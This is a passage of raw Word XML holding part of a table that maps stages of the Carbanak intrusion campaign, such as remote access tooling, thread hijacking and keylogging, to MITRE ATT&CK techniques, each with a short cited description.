                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003E52D1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B96B68E" w14:textId="35864F70" w:rsidR="00B707D9" w:rsidRPr="003E52D1" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A65318">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00A65318">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">1105 </w:t>
            </w:r>
            <w:r w:rsidR="0058741C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="0058741C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A65318">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FE61743" w14:textId="5B840CFF" w:rsidR="00B707D9" w:rsidRPr="003E52D1" w:rsidRDefault="00E902FA" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="605" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="330D3B11" w14:textId="77777777" w:rsidR="00B707D9" w:rsidRPr="003E52D1" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1101" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51C172D2" w14:textId="0179FD86" w:rsidR="00B707D9" w:rsidRPr="003E52D1" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1177" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39174F97" w14:textId="181EF44F" w:rsidR="00B707D9" w:rsidRPr="003E52D1" w:rsidRDefault="00E902FA" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3152" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E551D36" w14:textId="48E455E1" w:rsidR="00B707D9" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:r>
              <w:t xml:space="preserve">[1] They then install additional software such as the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Ammyy</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Remote Administration Tool, or even compromise SSH servers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B707D9" w:rsidRPr="00B54923" w14:paraId="69D55B34" w14:textId="77777777" w:rsidTr="00BC3894">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="585" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5244D0BA" w14:textId="4A6A2BE3" w:rsidR="00B707D9" w:rsidRPr="00B54923" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B54923">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00E902FA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1497" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="350853D3" w14:textId="366DB05B" w:rsidR="00B707D9" w:rsidRPr="00B54923" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B54923">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B54923">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B54923">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B84A0D8" w14:textId="4DE0B9BB" w:rsidR="00B707D9" w:rsidRPr="00B54923" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B54923">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B54923">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1219 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B54923">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Remote Access Software</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A1B341E" w14:textId="5EB1BDAD" w:rsidR="00B707D9" w:rsidRPr="00B54923" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B54923">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00E902FA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="605" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7443C495" w14:textId="77777777" w:rsidR="00B707D9" w:rsidRPr="00B54923" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1101" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C7A8D63" w14:textId="3FFFA2FF" w:rsidR="00B707D9" w:rsidRPr="00B54923" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1177" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10AB3ED7" w14:textId="4E90423F" w:rsidR="00B707D9" w:rsidRPr="00B54923" w:rsidRDefault="00E902FA" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>I</w:t>
            </w:r>
            <w:r w:rsidR="007D24A1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>F</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3152" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14966CB7" w14:textId="7D51B90E" w:rsidR="00B707D9" w:rsidRPr="00B54923" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="00E902FA">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E902FA" w:rsidRPr="003E52D1" w14:paraId="4957C06F" w14:textId="77777777" w:rsidTr="00134A75">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="585" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0372FFB2" w14:textId="738C2C4A" w:rsidR="00E902FA" w:rsidRDefault="00E902FA" w:rsidP="00134A75">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1497" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DC80FE0" w14:textId="69EE3A88" w:rsidR="00E902FA" w:rsidRDefault="00E902FA" w:rsidP="00134A75">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0004 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F15F7C4" w14:textId="7CA25B84" w:rsidR="00E902FA" w:rsidRPr="00040CB5" w:rsidRDefault="008133A7" w:rsidP="00134A75">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008133A7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1055.003</w:t>
            </w:r>
            <w:r w:rsidR="0058741C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00E902FA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00E902FA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="008133A7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Process Injection: Thread Execution Hijacking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78CEE98D" w14:textId="534C4FD8" w:rsidR="00E902FA" w:rsidRDefault="00E902FA" w:rsidP="00134A75">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="605" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34E2ADC6" w14:textId="77777777" w:rsidR="00E902FA" w:rsidRPr="00E902FA" w:rsidRDefault="00E902FA" w:rsidP="00134A75">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1101" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77315FF7" w14:textId="5185055A" w:rsidR="00E902FA" w:rsidRPr="00E902FA" w:rsidRDefault="00E902FA" w:rsidP="00134A75">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E902FA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1177" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C3B7B2B" w14:textId="5473832B" w:rsidR="00E902FA" w:rsidRPr="00E902FA" w:rsidRDefault="00E902FA" w:rsidP="00134A75">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3152" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2015AFB8" w14:textId="77777777" w:rsidR="00E902FA" w:rsidRDefault="00E902FA" w:rsidP="00E902FA">
            <w:r>
              <w:t xml:space="preserve">[1] Once the system is infected, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Carbanak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> logs keystrokes and takes screenshots </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B02E860" w14:textId="77777777" w:rsidR="00E902FA" w:rsidRDefault="00E902FA" w:rsidP="00E902FA">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">every 20 seconds. This monitoring is performed by intercepting the </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50F104F3" w14:textId="3999B678" w:rsidR="00E902FA" w:rsidRPr="00E902FA" w:rsidRDefault="00E902FA" w:rsidP="00E902FA">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ResumeThread</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> call.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E902FA" w:rsidRPr="003E52D1" w14:paraId="107E1B9D" w14:textId="77777777" w:rsidTr="00134A75">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="585" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4109CF3B" w14:textId="2E6C29B8" w:rsidR="00E902FA" w:rsidRDefault="00E902FA" w:rsidP="00134A75">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="008B7210">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1497" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="305FE0E7" w14:textId="022885CB" w:rsidR="00E902FA" w:rsidRDefault="008133A7" w:rsidP="00134A75">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6943C8EB" w14:textId="0AD9D863" w:rsidR="00E902FA" w:rsidRPr="00040CB5" w:rsidRDefault="008133A7" w:rsidP="00134A75">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008133A7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1055.003</w:t>
            </w:r>
            <w:r w:rsidR="00E902FA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00E902FA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="008133A7">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Process Injection: Thread Execution Hijacking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="687FD8C1" w14:textId="24C303AF" w:rsidR="00E902FA" w:rsidRDefault="00702450" w:rsidP="00134A75">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="605" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BAB47D9" w14:textId="77777777" w:rsidR="00E902FA" w:rsidRPr="003E52D1" w:rsidRDefault="00E902FA" w:rsidP="00134A75">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1101" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44EFFA3E" w14:textId="772B3B16" w:rsidR="00E902FA" w:rsidRDefault="00E902FA" w:rsidP="00134A75">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1177" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="455FEF05" w14:textId="3BD12E82" w:rsidR="00E902FA" w:rsidRPr="003E52D1" w:rsidRDefault="00E902FA" w:rsidP="00134A75">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-PES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3152" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C616C22" w14:textId="24471787" w:rsidR="00E902FA" w:rsidRDefault="00E902FA" w:rsidP="00134A75">
            <w:r>
              <w:t xml:space="preserve">[1] Once the system is infected, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Carbanak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> logs keystrokes and takes screenshots every 20 seconds. This monitoring is performed by intercepting the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ResumeThread</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> call.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E902FA" w:rsidRPr="003E52D1" w14:paraId="16FB4AD2" w14:textId="77777777" w:rsidTr="00134A75">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="585" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FA280C8" w14:textId="4E8E0CCF" w:rsidR="00E902FA" w:rsidRDefault="008B7210" w:rsidP="00134A75">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1497" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58333FFD" w14:textId="77777777" w:rsidR="00E902FA" w:rsidRPr="003E52D1" w:rsidRDefault="00E902FA" w:rsidP="00134A75">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0009 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="412AA3C1" w14:textId="35A1677D" w:rsidR="00E902FA" w:rsidRPr="00C224B4" w:rsidRDefault="00E902FA" w:rsidP="00134A75">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00040CB5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">T1056.001 </w:t>
            </w:r>
            <w:r w:rsidR="004D3C77">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="004D3C77">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00040CB5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Input Capture: Keylogging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BD8EA99" w14:textId="7B29E3A0" w:rsidR="00E902FA" w:rsidRDefault="00702450" w:rsidP="00134A75">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00620D6E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="605" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BACADFF" w14:textId="77777777" w:rsidR="00E902FA" w:rsidRPr="003E52D1" w:rsidRDefault="00E902FA" w:rsidP="00134A75">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
